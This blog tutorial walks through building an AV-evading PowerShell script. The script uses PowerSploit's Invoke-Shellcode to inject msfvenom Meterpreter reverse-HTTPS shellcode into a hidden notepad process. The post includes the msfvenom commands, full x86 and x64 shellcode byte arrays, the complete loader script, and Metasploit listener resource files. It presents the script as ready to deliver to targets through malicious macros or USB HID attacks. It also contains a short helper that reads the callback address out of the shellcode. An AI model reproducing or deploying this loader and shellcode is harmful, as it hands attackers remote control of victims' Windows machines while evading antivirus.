July 19, 2018

Using PowerSploit to inject MSFVenom shellcode

(Last Updated On: 21st September 2016)

This article will discuss how to use the rather brilliant PowerSploit project, coupled with MSFVenom, to inject a staged Meterpreter reverse HTTPS shell into a running process.  The finished script can itself be Base64 encoded and delivered by a USB HID attack or a macro-laden document; I will write the relevant guides for those too.

As an extra incentive to stick with this article, here is a screenshot of the finished, completely self-contained PowerShell script uploaded to nodistribute.com.  Not a single AV engine flagged it, even though running it hands control of your Windows device to the attacker.  Bear in mind that this is a static scan of the file on disk at the time of writing: on Windows 10, PowerShell 5 passes script content (including anything run through iex) to AMSI at execution time, so a clean static result is not a guarantee that the script runs undetected.

[Screenshot: nodistribute.com scan results for the finished script, no detections]

And to prove the code and concept, a quick screenshot from Metasploit showing the payload executing and the Meterpreter session opening.

[Screenshot: Metasploit console showing the Meterpreter session]

So, now you’ve seen the proof let’s get started.

Step 1 – Download Invoke-Shellcode and convert it to Base64.

We use Base64 encoding because it turns the whole script into a single string that drops straight into a PowerShell variable.  Embedding the PowerSploit script inside ours keeps the payload self-contained rather than fetching it from GitHub at execution time.  So download it from here (the PowerSploit repository) and use my text-file-to-Base64 script to convert it into one long Base64 string.  Before you do that, it is a good opportunity to go through and remove any bloat such as the comment-based help, full-line comments and the default shellcode built into the function; the less you embed, the smaller the final file.

Step 2 – Generate some shellcode

This article is not a guide to MSFVenom in general, only to one specific use of it.  I will also assume you know how to install and boot Kali Linux in some form or another (I use VMware Player).  The commands below generate the reverse Meterpreter stager as a PowerShell byte array (-f ps1).  Replace [Your IP] with the IP of your Kali box: its LAN address if the target is on the same LAN, or an Internet-reachable address if the target is out on the Internet.  LPORT must match the handler you set up in Step 4; 443 is used throughout so the callback looks like ordinary HTTPS traffic.  The first command generates x86 shellcode, the second x64.

msfvenom -p windows/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=443
msfvenom -p windows/x64/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=443

Copy the output of both commands; it gets pasted into the script in the next step.
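Before pasting msfvenom's output into anything, it is worth checking which callback address the stager actually carries (the sample bytes left in the script later in this article carry the author's lab address, 192.168.209.128:443, not yours).  The following is an added example and is not code from the original post or from Metasploit.  It reads a -f ps1 file and recovers LHOST from the NUL-terminated ASCII string the reverse_http(s) stagers embed, and LPORT from the opcode context visible in this article's listings (mov r8, imm32 followed by xor r9, r9 on x64; push imm32 followed by a call on x86), which is an assumption that may not hold for other stager versions.  The two embedded samples are constructed from byte runs in the page's own listings and are not complete shellcode; the file and function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original post: recover the callback address baked
# into msfvenom "-f ps1" reverse_http(s) shellcode before pasting it into the loader.
# Usage: sh check_callback.sh shellcode.ps1   (prints LHOST:LPORT)
set -eu
export LC_ALL=C   # byte-oriented grep/tr regardless of the terminal locale

# Collapse the "$buf" lines of a -f ps1 file into one line of space-separated hex bytes.
# Only $buf lines are read, so stray "0x" text elsewhere in a file cannot pollute the result.
ps1_bytes() {
  grep -E '^\[Byte\[\]\] \$buf|^\$buf \+=' "$1" \
    | grep -o '0x[0-9a-fA-F]\{1,2\}' \
    | while read -r tok; do printf '%02x ' "$tok"; done
  echo
}

# LHOST is stored as a NUL-terminated ASCII string in the stager, so render each byte,
# cut the stream at every non-printable byte and look for a dotted quad.
stager_host() {
  for hh in $(ps1_bytes "$1"); do
    printf "\\$(printf '%03o' "0x$hh")"
  done | tr -c '[:print:]' '\n' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | head -n 1
}

# LPORT is a 32-bit little-endian immediate. The opcode context is taken from the stagers
# on this page (assumption: other stager versions may lay this out differently):
#   x64  49 c7 c0 <imm32> 4d 31 c9   mov r8, imm32 ; xor r9, r9
#   x86  68 <imm32> e8                push imm32    ; call
stager_port() {
  m=$(ps1_bytes "$1" \
      | grep -oE '49 c7 c0 ([0-9a-f]{2} ){4}4d 31 c9|68 ([0-9a-f]{2} ){4}e8' \
      | head -n 1)
  [ -n "$m" ] || return 1
  set -- $m
  case "$1" in
    49) set -- "$4" "$5" "$6" "$7" ;;   # drop the 49 c7 c0 prefix
    68) set -- "$2" "$3" "$4" "$5" ;;   # drop the 68 prefix
  esac
  printf '%d\n' "0x$4$3$2$1"            # reverse the byte order, print decimal
}

stager_callback() {
  printf '%s:%s\n' "$(stager_host "$1")" "$(stager_port "$1")"
}

# Constructed samples: byte runs taken from the page's x64 and x86 listings around the
# address and port fields. They exercise the parser and are not working shellcode.
SAMPLE_X64='[Byte[]] $buf = 0xe8,0x10,0x0,0x0,0x0,0x31,0x39,0x32,0x2e,0x31
$buf += 0x36,0x38,0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38
$buf += 0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1
$buf += 0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53'
SAMPLE_X86='[Byte[]] $buf = 0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0xbb,0x1,0x0,0x0
$buf += 0xe8,0x24,0x1,0x0,0x0,0x2f,0x52,0x5f,0x69,0x4e
$buf += 0x31,0x39,0x32,0x2e,0x31,0x36,0x38
$buf += 0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38,0x0,0xbb'

if [ $# -eq 1 ]; then
  stager_callback "$1"
else
  for s in "$SAMPLE_X64" "$SAMPLE_X86"; do
    f=$(mktemp)
    printf '%s\n' "$s" > "$f"
    stager_callback "$f"     # both fragments report 192.168.209.128:443
    rm -f "$f"
  done
fi
```

Run it against the file msfvenom wrote and compare the line it prints with the LHOST and LPORT you intended; an empty host or a missing port means the bytes did not come from a stager this parser understands, and you should inspect them by hand rather than trust the heuristic.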

Step 3 – Populate this script

Okay, so here is our PowerShell script which puts the two things together.  Put your Base64 string between the quotes where it says $invokeShellCodeBase64 = "..." (it is going to be looooooong) and then insert your x86 and x64 shellcode where the comments tell you to.  Do not ship the sample shellcode left in the listing: it was generated for my lab with LHOST 192.168.209.128 and LPORT 443 baked in (the IP is readable in the ASCII bytes 0x31,0x39,0x32,0x2e,... and the port is the 0xbb,0x1 immediate), so it would never call back to you.  The script launches notepad.exe as the host process and picks the x86 or x64 shellcode to match its bitness, which is the bitness of the PowerShell that launched it.

Here is the script:

# Rebuild Invoke-Shellcode from the embedded Base64 and define it in this session.
# The "? {$_}" filter drops null bytes, which only matters if the file was saved as
# UTF-16 before encoding; with a UTF-8 source it is a no-op.
$invokeShellCodeBase64 = "..."
$invokeShellCodeString = [System.Text.Encoding]::UTF8.GetString(([System.Convert]::FromBase64String($invokeShellCodeBase64) | ? {$_} ))
iex($invokeShellCodeString)

# Start a fresh notepad.exe as the host process and keep the Process object so we inject
# into exactly this instance (Get-Process -Name notepad | select -Last 1 could return a
# notepad the user already had open).  Hidden, so no window appears on the target's desktop.
$notepadPID = Start-Process -FilePath notepad.exe -WindowStyle Hidden -PassThru

# The shellcode must match the bitness of the process it runs in.  notepad.exe inherits the
# bitness of the PowerShell that launched it (64-bit PowerShell starts System32\notepad.exe;
# 32-bit PowerShell on 64-bit Windows is redirected to SysWOW64\notepad.exe), so testing our
# own process is enough.
if ([Environment]::Is64BitProcess)
{
##### Insert x64 shellcode here (msfvenom -p windows/x64/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=443)
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0
$buf += 0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2
$buf += 0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48
$buf += 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7
$buf += 0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c
$buf += 0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41
$buf += 0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52
$buf += 0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78
$buf += 0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b
$buf += 0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67
$buf += 0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40
$buf += 0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41
$buf += 0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48
$buf += 0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1
$buf += 0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45
$buf += 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49
$buf += 0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40
$buf += 0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1
$buf += 0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58
$buf += 0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52
$buf += 0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9
$buf += 0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49
$buf += 0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41
$buf += 0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26
$buf += 0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a
$buf += 0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba
$buf += 0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0xe8,0x10,0x0,0x0,0x0,0x31,0x39,0x32,0x2e,0x31
$buf += 0x36,0x38,0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38
$buf += 0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1
$buf += 0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53
$buf += 0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0
$buf += 0xff,0xd5,0xe8,0x82,0x0,0x0,0x0,0x2f,0x64,0x33
$buf += 0x67,0x58,0x57,0x4c,0x73,0x44,0x51,0x56,0x45,0x4a
$buf += 0x72,0x51,0x69,0x76,0x58,0x6b,0x5f,0x6a,0x50,0x41
$buf += 0x43,0x45,0x63,0x42,0x51,0x6c,0x69,0x35,0x74,0x78
$buf += 0x5f,0x41,0x7a,0x43,0x42,0x47,0x56,0x4d,0x35,0x6d
$buf += 0x58,0x4f,0x68,0x35,0x61,0x57,0x64,0x71,0x38,0x41
$buf += 0x32,0x69,0x58,0x5a,0x62,0x5a,0x73,0x63,0x72,0x61
$buf += 0x2d,0x34,0x6a,0x37,0x4f,0x70,0x5f,0x48,0x68,0x4f
$buf += 0x61,0x34,0x47,0x6e,0x77,0x70,0x33,0x65,0x42,0x66
$buf += 0x63,0x50,0x4f,0x64,0x43,0x6e,0x50,0x7a,0x46,0x47
$buf += 0x57,0x30,0x47,0x4e,0x6e,0x76,0x5a,0x63,0x6c,0x63
$buf += 0x64,0x43,0x56,0x65,0x66,0x70,0x6d,0x6d,0x33,0x6a
$buf += 0x6b,0x31,0x6c,0x77,0x65,0x62,0x49,0x59,0x76,0x70
$buf += 0x2d,0x45,0x70,0x68,0x57,0x74,0x0,0x48,0x89,0xc1
$buf += 0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8
$buf += 0x0,0x32,0xa0,0x84,0x0,0x0,0x0,0x0,0x50,0x53
$buf += 0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5
$buf += 0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a
$buf += 0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89
$buf += 0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e
$buf += 0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x89,0xf1
$buf += 0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53
$buf += 0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85
$buf += 0xc0,0x75,0xc,0x48,0xff,0xcf,0x74,0x2,0xeb,0xc0
$buf += 0xe8,0x56,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a
$buf += 0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0
$buf += 0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0
$buf += 0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48
$buf += 0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7
$buf += 0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba
$buf += 0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b
$buf += 0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0x58
$buf += 0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5
$buf += 0xa2,0x56,0xff,0xd5
}
else
{
##### Insert x86 shellcode here (msfvenom -p windows/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=443)
[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31
$buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52
$buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff
$buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd
$buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b
$buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1
$buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3
$buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac
$buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3
$buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58
$buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c
$buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24
$buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f
$buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65
$buf += 0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c
$buf += 0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53
$buf += 0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53
$buf += 0x53,0x6a,0x3,0x53,0x53,0x68,0xbb,0x1,0x0,0x0
$buf += 0xe8,0x24,0x1,0x0,0x0,0x2f,0x52,0x5f,0x69,0x4e
$buf += 0x57,0x61,0x6e,0x69,0x78,0x30,0x67,0x61,0x71,0x68
$buf += 0x75,0x72,0x54,0x55,0x6a,0x78,0x71,0x77,0x47,0x50
$buf += 0x45,0x30,0x56,0x34,0x36,0x4f,0x35,0x36,0x49,0x65
$buf += 0x43,0x31,0x58,0x62,0x45,0x51,0x78,0x34,0x44,0x4a
$buf += 0x59,0x2d,0x31,0x62,0x64,0x34,0x4b,0x41,0x4a,0x74
$buf += 0x4f,0x76,0x49,0x5f,0x43,0x38,0x4c,0x2d,0x77,0x38
$buf += 0x32,0x52,0x33,0x36,0x41,0x62,0x38,0x63,0x67,0x74
$buf += 0x31,0x68,0x6b,0x79,0x71,0x77,0x74,0x77,0x54,0x59
$buf += 0x59,0x53,0x4b,0x73,0x79,0x53,0x54,0x79,0x71,0x66
$buf += 0x6d,0x37,0x41,0x65,0x52,0x35,0x38,0x41,0x33,0x7a
$buf += 0x42,0x79,0x51,0x31,0x6d,0x6c,0x44,0x79,0x54,0x71
$buf += 0x6a,0x58,0x49,0x63,0x50,0x71,0x43,0x74,0x70,0x69
$buf += 0x61,0x54,0x73,0x72,0x6f,0x48,0x4d,0x71,0x51,0x49
$buf += 0x70,0x61,0x48,0x74,0x5f,0x42,0x33,0x41,0x56,0x66
$buf += 0x6e,0x6b,0x6d,0x6a,0x6d,0x49,0x39,0x4a,0x6d,0x59
$buf += 0x66,0x72,0x32,0x4b,0x4f,0x0,0x50,0x68,0x57,0x89
$buf += 0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x32
$buf += 0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb
$buf += 0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x68
$buf += 0x80,0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a
$buf += 0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53
$buf += 0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff
$buf += 0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xd9,0xe8,0x4c
$buf += 0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0
$buf += 0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53
$buf += 0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68
$buf += 0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89
$buf += 0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1
$buf += 0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77
$buf += 0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38
$buf += 0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38,0x0,0xbb
$buf += 0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5
}

# Inject into the notepad process.  -Force skips Invoke-Shellcode's confirmation prompt,
# which would otherwise hang an unattended run; without -ProcessID it would inject into
# this PowerShell process instead.
Invoke-Shellcode -Force -Shellcode $buf -ProcessID $notepadPID.Id

Step 4 – Set up the Meterpreter listener

On your Kali box we need a listener to receive the reverse shell from the target that executes the script.  The easy way is to write the Metasploit commands into a resource file and launch msfconsole with it.  Port 443 is privileged, so msfconsole must run as root (or via sudo).

Pick the listener that matches the target's architecture, or run both.  A handler only serves the architecture of the PAYLOAD it is set to, and two handlers cannot share LPORT 443 on one box, so if you want both you must give the x64 pair a different port (in the msfvenom command as well as the handler) or run the second handler on a device with a different IP address.  exploit -j -z backgrounds each handler as a job, so both can live in the same msfconsole.

Here is the code for the x86 listener.

# cat > overwrites the file, so re-running does not append a second copy of the commands
cat > instructions.rc <<'EOF'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z
EOF
msfconsole -r instructions.rc

Here is the code for the x64 listener.

# Separate file so it does not clobber the x86 one.  If both handlers run on this box,
# change LPORT here and in the x64 msfvenom command to a port the x86 handler is not using
cat > instructions64.rc <<'EOF'
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z
EOF
msfconsole -r instructions64.rc

Step 5 – Get the target to run your PowerShell script

I will write some guides on this soon.  For now try my macro guide and USB HID Attack guide.


Simon is a sysadmin for a global financial organisation and specialises in Windows, security and automation.
